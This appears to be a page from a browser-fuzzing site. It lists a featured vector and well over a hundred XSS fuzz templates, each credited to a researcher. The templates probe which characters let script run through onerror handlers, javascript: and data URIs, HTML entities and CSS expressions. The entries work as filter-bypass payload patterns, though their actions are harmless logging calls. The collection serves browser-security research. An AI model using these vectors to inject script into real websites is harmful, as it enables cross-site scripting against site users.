Featured vector

Chrome 26.0
<img src=# aaa0x0donerror="alert(1)">

2,119,178 Successful fuzzes

Fuzz Vectors

All vectors

Description Vector Created by
Characters that break attribute names <img src=# aaa*chr*onerror="logChr(*num*)"> @albinowax
char after lt still valid html <*chr*a href=x onerror=logChr(*num*)> @ethicalhack3r
Characters allowed after string multiline separator <script> var x = "asdf\*chr* asdf"; logChr(*num*); </script> @tifkin_
Characters allowed between attributes <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @tifkin_
lt eating char log <img src=x *chr*> onerror="console.log(document.getElementsByTagName('html')[0].innerHTML)"> @insertScript
Characters not encoded with encodeURIComponent <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
Characters not encoded with encodeURI <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
lt eating char v2 <img src=x *chr*> onerror=logChr(*num*)> @insertScript
lt eating char <img src=x *chr*> onerror=logChr(*num*)> @insertScript
Characters after javascript uri <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @insertScript
characters allowed in html entities <a href="javascript&co*chr*lon;alert(1)" id="fuzzelement*num*">test</a> @insertScript
Characters before javascript uri <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @insertScript
Easter challenge min sequence 2 <script> str=*datajstest*+*datajstest2*+*datajstest3*+*datajstest4*+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script> @garethheyes
Easter challenge min sequence <script> str=*datajstest*+*datajstest2*+*datajstest3*+*datajstest4*+*datajstest5*+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script> @garethheyes
SVG script <svg><script*chr*>logChr(*num*)</script></svg> @garethheyes
Entities allowed with no semi colon htmlStr = '<div title="'+*dataentities*.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(*dataentities*); } }catch(e){}; @garethheyes
HTML Entity in between and <img src=xx:xx onerror="&*chr*#X61;lert(*num*);logChr(*num*)"> @MisterJyu
JS Property check middle character <img src=xx:xx onerror=window[['log*chr*Chr']](*num*)> @garethheyes
JS Property check ending character <img src=xx:xx onerror=window[['logChr*chr*']](*num*)> @garethheyes
Characters allowed before slashes no protocol <a href="*chr*//google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside slashes no protocol <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash 2 <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after slash <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside http <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed within an attribute name (on()load) "'><img src="xx:xx" on*chr*error="log(*num*);"> @skeptic_fx
Characters transformed in expando attributes <div id="fuzzelement*num*" expando*chr*="123">test</div> @garethheyes
Expandos attributes characters removed <div id="fuzzelement*num*" expando*chr*=123>test</div> @garethheyes
Valid chars before img word in img tag <!-- sample vector --> <*chr*img src=xx:xx onerror=logChr(*num*)> @ontrif
Equals equivalent signs in attributes <!-- sample vector --> <img src=xx:xx onerror*chr*logChr(*num*)> @WisecWisec
meta refresh tag content attribute url overwrite <!-- sample vector --> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?*chr*;URL=javascript:logChr(*num*)//"> @olemoudi
is my browser leaking location <iframe src=http://businessinfo.co.uk onload="if(/^http:\/\/businessinfo.co.uk\/?/.test(this.contentWindow.location)){logBoolean(true);}else{logBoolean(false)}"></iframe> @garethheyes
Characters between time and URL in meta redirects <meta http-equiv=refresh content="0*chr*javascript:logChr('*num*')"> @avlidienbrunn
Characters allowed inside jsurl <a href="java*chr*script:alert(1)" id="fuzzelement*num*">test</a> @avlidienbrunn
justatest2 <!-- sample vector --> <img*chr*src=xx:xx onerror=logChr(*num*)> @evilcos
Characters allowed instead of forward slash in url <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of colon in js url <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Cookie fuzzing <script> document.cookie='*chr*'; if(document.cookie !== '*chr*') { logChr(*num*,document.cookie); } </script> @garethheyes
Tags that have the onload event <*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*> @garethheyes
chars allowed after colon v2 htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed in colon v2 htmlStr = '<a href="javascript&col'+*chr*+'on;123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed after colon htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*chr*); } }catch(e){}; @heyheyheyhey10
Characters consuming spaces between lt and tag name <*chr* script>logChr(*num*)</script> @blubbfiction
Characters allowed as vbscript variables <img src=x:xx onerror="try {execScript('*chr*=1','vbs');log(*num*);}catch(e){}"> @garethheyes
possible chars in base64 encoding <svg><script xlink:href=YWxl*chr*cnQoMSk= ></script> @heyheyheyhey10
Replacement for s in script tag <*chr*cript>logChr(*num*)</script> @blubbfiction
Replacement for lt in tag *chr*script>logChr(*num*)</script> @blubbfiction
Characters inside script tag name <scr*chr*ipt>logChr(*num*)</script> @blubbfiction
Characters between lt and tag name <*chr*script>logChr(*num*)</script> @blubbfiction
char for firing onload event <img src=*chr* onload=logChr(*num*)> @heyheyheyhey10
aaaaa <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @goroasd
html dataentities before event handler <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> @testacc40590139
Entities allowed instead of colon for js protocol htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @peksa
Entities allowed after js protocol htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before js protocol htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed inside js protocol htmlStr = '<a href="java'+*dataentities*+'script:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before CSS rule htmlStr = '<div style="'+*dataentities*+'color:#cccccc;"></div>'; document.getElementById('placeholder').innerHTML = htmlStr; if(document.getElementById('placeholder').firstChild.style.color.length) { customLog(*dataentities*); } @garethheyes
img srcX onerroralert(1) <div style="color:red'{}*chr* x:expression(logChr(*num*))*chr*">.</div> @qbye
Break out of HTML element from single quoted attribute <img src='xx:x*chr*><img src=xx:x onerror=logChr(*num*)>'> @peksa
Escaped characters that break out of single quote HTML attribute <img src='xx:x\*chr* onerror="logChr(*num*)">'> @peksa
Characters that escape single quoted HTML attributes <img src='xx:x*chr* onerror="logChr(*num*)">'> @peksa
Marios challenge <*datahtmlelements* value="1" *datadhtmlprops*="test" *dataevents*="test" *datahtmlattributes*="test">1</*datahtmlelements*><script>if(test == "1") parent.customLog('<*datahtmlelements* value="1" *datadhtmlprops*="test" *dataevents*="test" *datahtmlattributes*="test">1</*datahtmlelements*>');</script> @0xAli
Characters syntactically equivalent to double quote in HTML attributes `"'><img src="#*chr* onerror=log(*num*)> @p_laguna
Eating backslash <img src=xx:xx onerror="x='*chr*\',logChr(*num*)//'"> @garethheyes
Character allowed after the slash for end script tag <script>alert(logChr(*num*))</*chr*script> @MisterJyu
Character allowed before the slash for end script tag <script>alert(logChr(*num*))<*chr*/script> @MisterJyu
Characters that break out of script variables <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> @garethheyes
Char that allows you to act as a slash in closing tag 2 <script>log(*num*)<*chr*script></script> @notxssninja
Characters that close a HTML comment 3 --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> @DOMXss
Characters that are spaces <img src=xx:xx onerror="*num*<=0xffff&&/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Characters that are new lines <img src=xx:xx onerror="!/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Attribute separators <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes after hash <img src=xx:xx#*chr*/onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> @garethheyes
JS in img src for selfxss <img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"> @ethicalhack3r
Char after lt <*chr*script>alert(*num*)</script> @ethicalhack3r
Determine what character can be at the end of the javascript but before the colon <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> @MisterJyu
Characters allowed as slash in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '/somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as gt in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '>somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as lt in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '<somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as _ in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '_somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as s in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*omehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as h in http <script> !function(){ var a = document.createElement('a'); a.href='\*chr*ttp://somehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after colon in url (no slashes) <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after slash in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after colon in url <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*//somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed between slashes <script> !function(){ var a = document.createElement('a'); a.href='/\*chr*/somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters to end script tag via JavaScript regex 002 <script>log(*num*,1</script*chr*//)</script> @0x6D6172696F
Characters to end script tag via JavaScript regex 001 <script>log(*num*,1</script*chr*/)</script> @0x6D6172696F
foobar <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*datadhtmlprops**datadhtmlprops**datadhtmlprops**datadhtmlprops**hex6**uni* @Sidhpurwala
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert
Hex characters allowed after asterisk in CSS comments <div id="fuzzelement*num*" style="/**\*hex2*/;color:#000000;"></div> @garethheyes
Characters allowed after asterisk in CSS comments <div id="fuzzelement*num*" style="/***chr*/;color:#000000;"></div> @garethheyes
Iframe contentDocument properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentDocument[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
Iframe contentWindow properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentWindow[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
Document body variables <script> props=props.concat(Object.getOwnPropertyNames(document.body)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(document.body[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Document variables <script> props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document[arguments[0]])customLog(arguments[0]); }catch(e){}; }) </script> @garethheyes
Function variables <script> props=props.concat(Object.getOwnPropertyNames(function(){})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(function(){}[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Object variables <script> props=props.concat(Object.getOwnPropertyNames({})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if({}[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Number variables <script> props=props.concat(Object.getOwnPropertyNames(new Number(123))); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if((123)[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
String variables <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(''[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Regexp variables <script> props=props.concat(Object.getOwnPropertyNames(/a/)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(/a/[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Array variables <script> props=props.concat(Object.getOwnPropertyNames([])); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if([][arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Window variables <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(window[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
aaaaaaaa <b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> @PunchyStickMeh
prime browser <b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> @thetestmanager
Alternatives to in attributes <img src=# onerror*chr*"log(*num*)" > @albinowax
Break out of title <title>hello*chr*<*chr**raw1*><script>alert(*num*)</script></title> @0xAli
Characters between rgb <div id="fuzzelement*num*" style="color:r*chr*gb(0,0,0);"></div> @garethheyes
Characters before rgb <div id="fuzzelement*num*" style="color:*chr*rgb(0,0,0);"></div> @garethheyes
Characters allowed before paren <div id="fuzzelement*num*" style="color:rgb*chr*(0,0,0);"></div> @garethheyes
Characters allowed after paren rule <div id="fuzzelement*num*" style="color:rgb(0,0,0)*chr*junk;"></div> @garethheyes
Valid characters after expression 4 <div style="xss:expression(logChr(*num*))\*hex2* junk"></div> @garethheyes
Valid characters after expression 3 <div style="xss:expression(logChr(*num*))'*chr*junk"></div> @garethheyes
Valid characters after expression 2 <div style="xss:expression(logChr(*num*))*chr**chr*junk"></div> @garethheyes
Valid characters after expression <div style="xss:expression(logChr(*num*))*chr*junk"></div> @garethheyes
Opening paren expression check <div style="xss:expression(logChr*chr**num*))">test</div> @garethheyes
Characters that trigger a new attr after new line <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> @garethheyes
Characters eating backslash in javascript string 2 <script>if("x\*chr*".length==2) { log(*num*);}</script> @mhswende
Characters eating backslash in javascript string <script>if("x\*chr*".length==1) { log(*num*);}</script> @mhswende
Quoteless attributes breaker <img src=xxx:xxx title=1*chr*/onerror=logChr(*num*)> @garethheyes
Characters ignored inside javascript string v2 <script>if("x*chr*x" == "xx") { log(*num*);}</script> @mhswende
Characters ignored in html event handler name <img src=x on*chr*Error="javascript:log(*num*)"/> @mhswende
Characters ignored in Javascript function call "`'><script>lo*chr*g(*num*)</script> @mhswende
Replacement for greater than sign *chr*script>log(*num*)</script> @mhswende
Characters allowed between tag and attribute <script*chr*type="text/javascript">log(*num*);</script> @0xAli
Characters which break attributes without quotes <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> @shafigullin
Single quote break <script charset='*chr*>log(*num*)</script> @0xAli
Characters that close a quote <script charset="*chr*>log(*num*)</script> @0xAli
Unicode sequences generating illegitimate ASCII <script> "\ud83d\u*hex4*".match(/.*<.*/) ? log(*num*) : null; </script> @0x6D6172696F
Characters allowed after ampersand in named character references <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> @_cweb
Characters ending HTML closing tags (HTML4) <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> @0x6D6172696F
Characters consuming backslashes and breaking JS strings <script>a='abc\*chr*\';log(*num*)//def';</script> @0x6D6172696F
Events in tags with src or href that execute javascript <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript 2 <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> @garethheyes
Tags that execute onerror <*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*> @garethheyes
Does this browser support e4x <script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script> @garethheyes
Characters to separate class names in class attributes <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> @0x6D6172696F
Characters allowed after uri host "`'/><img/onload=log(*num*) src="http://shazzer.co.uk*chr*/favicon.ico"/> @jackmasa
Determine what character can replace in end tags <script>log(*num*)<*chr*script> @MisterJyu
Characters that close a HTML comment 002 <!--*chr*<img src=xxx:x onerror=log(*num*)> --> @0x6D6172696F
Characters that close HTML tags <script>log(*num*)</script*chr* @0x6D6172696F
Characters not encoded by encodeURIComponent <script> if ('*uni*' === encodeURIComponent('*uni*')) { log(*num*); } </script> @shafigullin
Characters not encoded by encodeURI <script> if ('*uni*' === encodeURI('*uni*')) { log(*num*); } </script> @shafigullin
Characters allowed after script <script*chr*>log(*num*)</script> @garethheyes
Single character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Entity character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
determine what characters can be inside a script tag "`'><sc*chr*ript>log(*num*)</sc*chr*ript> @MisterJyu
Characters allowed attribute quote "/><img/onerror=*chr*log(*num*)*chr*src=xxx:x /> @jackmasa
determine any chars can go between the onerror attributes <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> @MisterJyu
Replacement for greater and less than signs (revised) *chr*script*chr* log(*num*) *chr**chr*script*chr @MisterJyu
Replacement for greater and less than signs *chr*script*chr alert(1) *chr**chr*script*chr @MisterJyu
Characters syntactically equivalent to single quote in HTML attributes `"'><img src='#*chr* onerror=log(*num*)> @_cweb
Characters syntactically equivalent to colon in a URI <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @_cweb
Characters breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Characters escaping JS comment delimiters 001 <script>/* **chr*/log(*num*)// */</script> @0x6D6172696F
Characters breaking CSS strings allowing expression "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters ending CSS values allowing expressions "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters breaking JavaScript Regex delimiter "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> @0x6D6172696F
Escape from attribute a closing tag <a href="*chr*><script>log(*num*)</script>" /> @shafigullin
Characters in script inside XML elements 004 "'`><p><svg><script>a='hello*chr*;log(*num*)//';</script></p> @0x6D6172696F
Characters in script inside XML elements 003 <p><svg><script>*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 002 <p><svg><script>l*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 001 <p><svg><script>*chr*log(*num*)</script></p> @0x6D6172696F
Space characters in RegExp <script> if ('*chr*'.replace(/\s/g, '') === '') { log(*num*); } </script> @shafigullin
Character between lt and slash in closing tag <script>log(*num*)<*chr*/script> @shafigullin
Characters allowed for padding in a VBS URI 002 <iframe src="vbscript:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed for padding in a VBS URI 001 <iframe src="vbs:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed between CSS expression chars 02 ABC<div style="x:expression*chr*(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS expression chars 01 ABC<div style="x:exp*chr*ression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS colon and expression ABC<div style="x:*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS prop and expression ABC<div style="x*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed for padding in a data URI 003 <script src="data:text/plain*chr*log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 002 <script src="data:*chr*,log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 001 <script src="data:text/plain,lo*chr*g(*num*)"></script> @0x6D6172696F
Characters trimmed by trim <script> if ('*chr*'.trim() === '') { log(*num*); } </script> @shafigullin
Characters before paren in Javascript call "'`><script>log*chr*(*num*)</script> @garethheyes
Characters before img "'`><*chr*img src=xxx:x onerror=log(*num*)> @garethheyes
Characters before script '`"><*chr*script>log(*num*)</script> @garethheyes
Characters in between protocol in js url <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after attribute name `"'><img src=xxx:x onerror*chr*=log(*num*)> @garethheyes
Characters that close JS Comments '"`><script>/* **chr*log(*num*)// */</script> @garethheyes
Characters allowed before protocol in js url <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed before colon in js url <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
NULL Characters inside JavaScript properties `'"><script>window['log*chr*'](*num*)</script> @garethheyes
Characters allowed before CSS properties '"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div> @garethheyes
Characters allowed before a JavaScript function "`'><script>*chr*log(*num*)</script> @garethheyes
Characters that close a HTML comment --><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> @garethheyes
Characters allowed before attribute name `"'><img src=xxx:x *chr*onerror=log(*num*)> @garethheyes